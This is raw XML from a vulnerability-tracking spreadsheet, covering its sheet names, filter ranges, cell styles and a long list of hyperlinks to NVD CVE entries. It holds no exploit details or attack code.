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ll CVEs" sheetId="2" state="visible" r:id="rId2"/>
    <sheet name="KEV - Exploited" sheetId="3" state="visible" r:id="rId3"/>
    <sheet name="Critical &amp; High" sheetId="4" state="visible" r:id="rId4"/>
    <sheet name="Watchlist" sheetId="5" state="visible" r:id="rId5"/>
    <sheet name="Packages (GHSA-OSV)" sheetId="6" state="visible" r:id="rId6"/>
  </sheets>
  <definedNames>
    <definedName name="_xlnm._FilterDatabase" localSheetId="1" hidden="1">'All CVEs'!$A$1:$S$1699</definedName>
    <definedName name="_xlnm._FilterDatabase" localSheetId="2" hidden="1">'KEV - Exploited'!$A$1:$S$4</definedName>
    <definedName name="_xlnm._FilterDatabase" localSheetId="3" hidden="1">'Critical &amp; High'!$A$1:$S$826</definedName>
    <definedName name="_xlnm._FilterDatabase" localSheetId="4" hidden="1">'Watchlist'!$A$1:$S$304</definedName>
    <definedName name="_xlnm._FilterDatabase" localSheetId="5" hidden="1">'Packages (GHSA-OSV)'!$A$1:$S$72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b val="1"/>
    </font>
    <font>
      <name val="Arial"/>
    </font>
    <font>
      <name val="Arial"/>
      <b val="1"/>
      <color rgb="00FFFFFF"/>
    </font>
    <font>
      <name val="Arial"/>
      <sz val="10"/>
    </font>
    <font>
      <name val="Arial"/>
      <color rgb="000563C1"/>
      <sz val="10"/>
      <u val="single"/>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center" wrapText="1"/>
    </xf>
    <xf numFmtId="0" fontId="5" fillId="0"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dxfs count="5">
    <dxf>
      <font>
        <b val="1"/>
        <color rgb="00FFFFFF"/>
      </font>
      <fill>
        <patternFill patternType="solid">
          <fgColor rgb="00C00000"/>
        </patternFill>
      </fill>
    </dxf>
    <dxf>
      <font>
        <b val="1"/>
        <color rgb="00FFFFFF"/>
      </font>
      <fill>
        <patternFill patternType="solid">
          <fgColor rgb="00E97132"/>
        </patternFill>
      </fill>
    </dxf>
    <dxf>
      <font>
        <b val="1"/>
        <color rgb="00000000"/>
      </font>
      <fill>
        <patternFill patternType="solid">
          <fgColor rgb="00F2C94C"/>
        </patternFill>
      </fill>
    </dxf>
    <dxf>
      <font>
        <b val="1"/>
        <color rgb="00000000"/>
      </font>
      <fill>
        <patternFill patternType="solid">
          <fgColor rgb="008FBC8F"/>
        </patternFill>
      </fill>
    </dxf>
    <dxf>
      <font>
        <b val="1"/>
        <color rgb="00FFFFFF"/>
      </font>
      <fill>
        <patternFill patternType="solid">
          <fgColor rgb="007030A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nvd.nist.gov/vuln/detail/CVE-2026-76460" TargetMode="External" Id="rId1" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-58704" TargetMode="External" Id="rId2" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-87886" TargetMode="External" Id="rId3" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-20130" TargetMode="External" Id="rId4" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-20192" TargetMode="External" Id="rId5" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-65381" TargetMode="External" Id="rId6" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-70416" TargetMode="External" Id="rId7" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-76423" TargetMode="External" Id="rId8" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-92808" TargetMode="External" Id="rId9" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-16338" TargetMode="External" Id="rId10" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-20234" TargetMode="External" Id="rId11" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-20307" TargetMode="External" Id="rId12" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-20322" TargetMode="External" Id="rId13" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-20324" TargetMode="External" Id="rId14" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-20325" TargetMode="External" Id="rId15" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-20329" TargetMode="External" Id="rId16" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-20330" TargetMode="External" Id="rId17" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-20332" TargetMode="External" Id="rId18" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-87719" TargetMode="External" Id="rId19" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2025-59953" TargetMode="External" Id="rId20" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-12793" TargetMode="External" Id="rId21" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-14349" TargetMode="External" Id="rId22" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-20242" TargetMode="External" Id="rId23" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-20326" TargetMode="External" Id="rId24" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-27546" TargetMode="External" Id="rId25" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-27565" TargetMode="External" Id="rId26" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-54334" TargetMode="External" Id="rId27" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-57127" TargetMode="External" Id="rId28" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-57131" TargetMode="External" Id="rId29" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-57967" TargetMode="External" Id="rId30" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-65414" TargetMode="External" Id="rId31" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-66302" TargetMode="External" Id="rId32" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-68839" TargetMode="External" Id="rId33" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-69829" TargetMode="External" Id="rId34" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-69910" TargetMode="External" Id="rId35" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-70296" TargetMode="External" Id="rId36" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-78573" TargetMode="External" Id="rId37" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-79724" TargetMode="External" Id="rId38" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-81204" TargetMode="External" Id="rId39" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-81467" TargetMode="External" Id="rId40" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-82617" TargetMode="External" Id="rId41" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-84520" TargetMode="External" Id="rId42" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-84561" TargetMode="External" Id="rId43" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-84609" TargetMode="External" Id="rId44" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-85594" TargetMode="External" Id="rId45" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-85595" TargetMode="External" Id="rId46" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-85596" TargetMode="External" Id="rId47" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-89778" TargetMode="External" Id="rId48" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-89783" TargetMode="External" Id="rId49" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-89788" TargetMode="External" Id="rId50" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-89847" TargetMode="External" Id="rId51" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-89857" TargetMode="External" Id="rId52" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-89969" TargetMode="External" Id="rId53" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-89970" TargetMode="External" Id="rId54" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-89972" TargetMode="External" Id="rId55" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-89990" TargetMode="External" Id="rId56" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-90012" TargetMode="External" Id="rId57" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-90036" TargetMode="External" Id="rId58" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-90037" TargetMode="External" Id="rId59" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-90038" TargetMode="External" Id="rId60" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-90042" TargetMode="External" Id="rId61" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-90048" TargetMode="External" Id="rId62" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-91843" TargetMode="External" Id="rId63" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-92787" TargetMode="External" Id="rId64" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-92805" TargetMode="External" Id="rId65" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-12944" TargetMode="External" Id="rId66" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-20331" TargetMode="External" Id="rId67" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-82107" TargetMode="External" Id="rId68" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-92716" TargetMode="External" Id="rId69" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-15640" TargetMode="External" Id="rId70" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-73453" TargetMode="External" Id="rId71" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-77411" TargetMode="External" Id="rId72" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-58146" TargetMode="External" Id="rId73" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-73447" TargetMode="External" Id="rId74" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-73461" TargetMode="External" Id="rId75" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-77405" TargetMode="External" Id="rId76" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-81046" TargetMode="External" Id="rId77" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-85192" TargetMode="External" Id="rId78" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-90680" TargetMode="External" Id="rId79" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-90937" TargetMode="External" Id="rId80" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-15639" TargetMode="External" Id="rId81" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-40855" TargetMode="External" Id="rId82" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-58147" TargetMode="External" Id="rId83" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-73172" TargetMode="External" Id="rId84" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-89082" TargetMode="External" Id="rId85" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-89083" TargetMode="External" Id="rId86" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-89775" TargetMode="External" Id="rId87" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-89914" TargetMode="External" Id="rId88" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-89915" TargetMode="External" Id="rId89" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-89916" TargetMode="External" Id="rId90" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-89918" TargetMode="External" Id="rId91" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-89930" TargetMode="External" Id="rId92" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-90049" TargetMode="External" Id="rId93" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-90945" TargetMode="External" Id="rId94" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-90961" TargetMode="External" Id="rId95" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-91104" TargetMode="External" Id="rId96" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-91106" TargetMode="External" Id="rId97" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-73456" TargetMode="External" Id="rId98" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-82067" TargetMode="External" Id="rId99" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-90562" TargetMode="External" Id="rId100" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-15638" TargetMode="External" Id="rId101" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-20176" TargetMode="External" Id="rId102" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-20194" TargetMode="External" Id="rId103" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-20211" TargetMode="External" Id="rId104" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-20237" TargetMode="External" Id="rId105" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-20284" TargetMode="External" Id="rId106" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-20305" TargetMode="External" Id="rId107" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-20306" TargetMode="External" Id="rId108" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-20341" TargetMode="External" Id="rId109" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-43790" TargetMode="External" Id="rId110" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-45764" TargetMode="External" Id="rId111" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-49364" TargetMode="External" Id="rId112" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-53713" TargetMode="External" Id="rId113" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-61594" TargetMode="External" Id="rId114" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-67593" TargetMode="External" Id="rId115" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-75156" TargetMode="External" Id="rId116" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-75513" TargetMode="External" Id="rId117" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-77408" TargetMode="External" Id="rId118" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-78299" TargetMode="External" Id="rId119" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-80424" TargetMode="External" Id="rId120" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-81642" TargetMode="External" Id="rId121" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-84625" TargetMode="External" Id="rId122" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-85597" TargetMode="External" Id="rId123" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-86881" TargetMode="External" Id="rId124" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-89779" TargetMode="External" Id="rId125" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-89786" TargetMode="External" Id="rId126" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-89846" TargetMode="External" Id="rId127" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-90011" TargetMode="External" Id="rId128" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-92395" TargetMode="External" Id="rId129" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-92717" TargetMode="External" Id="rId130" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-92720" TargetMode="External" Id="rId131" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-76420" TargetMode="External" Id="rId132" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-73455" TargetMode="External" Id="rId133" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-77403" TargetMode="External" Id="rId134" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-77410" TargetMode="External" Id="rId135" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-77412" TargetMode="External" Id="rId136" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-8462" TargetMode="External" Id="rId137" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2023-46273" TargetMode="External" Id="rId138" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-13293" TargetMode="External" Id="rId139" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-16428" TargetMode="External" Id="rId140" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-16466" TargetMode="External" Id="rId141" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-16673" TargetMode="External" Id="rId142" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-20333" TargetMode="External" Id="rId143" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-20336" TargetMode="External" Id="rId144" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-20340" TargetMode="External" Id="rId145" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-20344" TargetMode="External" Id="rId146" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-20360" TargetMode="External" Id="rId147" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-20361" TargetMode="External" Id="rId148" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-27547" TargetMode="External" Id="rId149" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-27548" TargetMode="External" Id="rId150" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-27549" TargetMode="External" Id="rId151" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-27550" TargetMode="External" Id="rId152" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-27551" TargetMode="External" Id="rId153" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" 